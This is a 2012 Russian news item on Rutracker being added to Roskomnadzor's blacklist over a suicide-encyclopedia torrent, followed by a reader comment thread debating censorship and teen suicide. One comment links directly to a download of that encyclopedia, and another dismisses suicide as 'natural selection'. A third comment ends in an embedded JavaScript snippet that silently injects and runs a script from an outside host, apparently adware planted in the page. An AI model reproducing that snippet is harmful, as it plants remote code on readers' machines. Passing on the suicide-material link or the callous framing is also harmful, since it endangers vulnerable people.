Rutracker.org внесен в реестр запрещенных ресурсов

image

Теги: rutracker.org, черный список, Роскомнадзор, новость

Администрация портала удалила запрещенный материал, однако ответа от Роскомнадзора так и не последовало.

Роскомнадзор внес торрент-портал Rutracker.org в черный список сайтов за раздачу материалов о суициде. Об этом сообщается в блоге портала.

По предоставленной администрацией ресурса информации, Роскомнадзор направил им уведомление о внесении в реестр запрещенных ресурсов страницы, которая содержала раздачу «Энциклопедия суицида». После получения официального обращения от ведомства Rutracker удалил запрещенный материал и направил ответное письмо в Роскомнадзор. Однако оно вернулось с пометкой «rejected».

На сайте реестра указано, что один из адресов Rutracker (http://rutracker.org/forum/viewtopic.php?t=620726) был внесен в «черный список» 12 ноября текущего года по решению Роскомнадзора от 10 ноября.

Напомним, что согласно правилам Роскомнадзора, на удаление запрещенного материала с сайта дается три дня. Если владельцы игнорируют уведомление ведомства, то блокируется весь сайт. После этого доступ к нему должны заблокировать все российские провайдеры.

Вчера 11 ноября 2012 года в реестр запрещенных ресурсов попал сайт онлайн-энциклопедии «Луркоморье». ФСКН добился включения IP-адреса «Луркоморья» в реестр из-за признаков пропаганды наркотиков на некоторых страницах интернет-энциклопедии.


или введите имя

CAPTCHA
Страницы: 1  2  3  
13-11-2012 13:13:44
да ппц. сейчас из-за это каши дети и узнают о всех "запретах"...
0 |
kjkj
13-11-2012 13:55:17
Вот честно! Я бы и не догадался что есть такая книжка или фильм, а сейчас думаю что надо бы изучить. Энциклопедия суицида
0 |
jack reaper
13-11-2012 14:38:49
Пошло-поехало, тысячи и миллионы пользователей интрента которые ни сном ни духом не догадывались о существовании этих ресурсов и контента- сейчас узнают об этом и полезут искать...
0 |
anonymous
13-11-2012 16:14:43
Вот, кому интересно, эта энциклопедия: http://ntb.dp5.ru/index.php/-1/187669-enciklopediya-suicida-m-2000-456-s-chm.html
0 |
Jack
13-11-2012 16:41:10
Для anonymous. На днях еще несколько детей покончили с собой, по разным маломотивированнным причинам. Некоторые использовали брючные ремни. Этодостаточно специфичный для обращения предмет, которым неинформированный человек вряд ли сумеет воспользоваться. А они знали как!Не вся информация должна быть в свободном доступе, не все стоит рекламировать. А дурак вы сейчас или подонок решать вам.
0 |
Loki
13-11-2012 16:55:00
2Jack Следить за детьми нужно лучше,тогда и вешаться не будут.А если уж в голову втемяшилось,то всё одно найдут как.Кстати эту книжку можно заказать на озоне.И вообще,суицид-это естественный отбор.
0 |
08609
14-11-2012 10:19:09
Не столько слежение за детьми играет росль, сколько воспитание. Причем одно дело как воспитывают родители, и другое дело как ребенок воспитывается примером окружающей действительности. И если он не видит себе в будущем достойного места в обществе (не работают социальные лифты, нет достойных зарплат, и т.п.), то родителям его сложно переубедить в обратном. Людям, а особенно детям нужна увереность в завтрашнем дне, что завтра будет лучше чем сегодня, и тут больше вопросов к государственым институтам.
0 |
noname
14-11-2012 10:45:06
Причем одно дело как воспитывают родители, и другое дело как ребенок воспитывается примером окружающей действительности.За "действительностью" и ее интерпретацией тоже должны следить родители/педагоги. тут больше вопросов к государственым институтам. Т.е. Вы хотите, чтоб все проблемы за людей решали какие-то "дяди"? Так вот они и решают. В меру своего представления.
0 |
08609
14-11-2012 13:20:00
Насчет интерпритации и действительности: как ребенку не говори что "нужно много учится чтоб потом много зарабатывать", но он видит соседа корупционера который не учился а имеет все, и другого соседа, который учился и не имеет не фига, и делает правильный вывод что ему родители врут (а ведь правдо врут). Дяди должны решать проблемы с устройством государства, чтоб дикларируемые ими правила поведения в обществе ими же и исполнялись в первую очередь.
0 |
гость
20-11-2012 13:10:54
Молодец 08609, правильно пишет!
0 |
jcmax
14-11-2012 21:36:20
фильтры ставить надо типа k9Webprotection. хрен удалят и хрен обманут. проверено. перепостите другим --> чтобы знали родители и были дети в сохраности. Ccылка, если надо. для установки нужна лицензия. получить можно зарегестрировавшись. лицензия 1год. для домашнего пользования бесплатно. для компаний смотри на сайте. http://www1.k9webprotection.com/
0 |
dfs
13-11-2012 22:20:13
А дурак вы сейчас или подонок решать вам. Ответить СсылкаДурак здесь вы, что не понимаете довольно простой вещи: лечить надо причины а не последствия. Вы говорите На днях еще несколько детей покончили с собой, по разным маломотивированнным причинам. Некоторые использовали брючные ремни. Это достаточно специфичный для обращения предмет, которым неинформированный человек вряд ли сумеет воспользоватьсяВо первых вы не понимаете что мало мотивированные причины они только для вас маломативированны. Для детей важно то что для взрослых кажется глупостью, это обычное свойство психологии разных лет. В 30 лет вас будет интересовать другое чем в 20 лет и совершенно другое чем в 10. Второе, насчет брючных ремней. Если у человека есть желание покончить с собой он это сделает и какая разница что там он будет использовать. Кухонные ножи не запретишь, бросится с окна, под колеса машины может каждый без особых знаний. Насчет "рекламы" мне кажется вы не учились в российских школах и совсем не понимаете из за чего люди вешаются для вас виновата реклама, Америка, белоленточники, сми и хрен знает что ещё. Я вот учился, и положа руку на сердце утверждаю что я бы мог повесится в то время из за социальной иерархии школ и той жестокости что там творится и мне глубоко по барабану было на какую то рекламу т.н "суицидов". Кто то вешается, кто то устраивает колумбайн а проблема остается. Читаем статью на лурке школьная иерархия и делаем выводы .
0 |
мимошел
14-11-2012 10:07:13
Мдя, парень ты больной или просто узколобый и недалекий, или только таким прикидываешься? (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
0 |
ужос
14-11-2012 10:30:04
90% самоубийц ели огурцы! Нужно запертить сей психоделический овощ, он мутит рассудок и толкает на смерть!
0 |
noname
14-11-2012 10:36:56
На днях еще несколько детей покончили с собой, по разным маломотивированнным причинам. Некоторые использовали брючные ремни.Запретить брючные ремни! Однозначно. И удалить из интернетов, книг и т.п. все упоминания о том, что брючные ремни когда-то существовали. И галстуки запретить - в моем детстве один товарисч повесился на галстуке (кстати, интернета тогда вообще не существовало) Веревки тоже запретить. И нитки заодно. Ножи, вилки, ножницы, бритвы, гвозди, иголки - запретить! Строить здания выше одного этажа и копать ямы гбубже трех метров - запретить. Автомобили - запретить. Электричество - запретить. Воду признать вредной и запретить! (А Вы заете, сколько детей тонут?!!) Про карандаши/ручки/бумагу - это я вообще молчу. Во-первых, это средство распространения "сведений...", а во-вторых - вдруг, какой дебил себе в глаз ткнет. А они знали как!М-м-да...
0 |
Страницы: 1  2  3